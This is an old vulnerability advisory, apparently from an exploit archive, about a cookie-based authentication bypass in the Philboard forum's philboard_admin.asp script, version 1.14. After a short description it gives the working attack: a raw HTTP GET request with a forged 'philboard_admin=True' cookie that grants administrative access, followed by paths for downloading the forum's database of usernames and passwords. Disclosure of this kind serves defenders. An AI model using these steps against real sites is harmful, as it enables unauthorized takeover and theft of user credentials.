22 lines
No EOL
920 B
Text
22 lines
No EOL
920 B
Text
source: https://www.securityfocus.com/bid/7739/info
|
|
|
|
A vulnerability has been discovered in the 'philboard_admin.asp' script used by Philboard. The problem occurs during authentication and may allow an attacker to gain unauthorized administrative access.
|
|
|
|
The issue presents itself when handling cookie-based authentication credentials.
|
|
|
|
By gaining administrative access an attacker may be capable of carrying out a variety of attacks.
|
|
|
|
It should be noted that although this vulnerability has been reported to affect philboard version 1.14 previous versions might also be affected.
|
|
|
|
Use telnet and open target on port 80
|
|
|
|
GET /board/philboard_admin.asp HTTP/1.0
|
|
Host: example.com
|
|
Cookie: philboard_admin=True;
|
|
|
|
Download the database (users and password):
|
|
|
|
Usually, the database location can be found and download it from:
|
|
http://www.target.com/database/philboard.mdb
|
|
or
|
|
http://www.target.com/forum/database/philboard.mdb |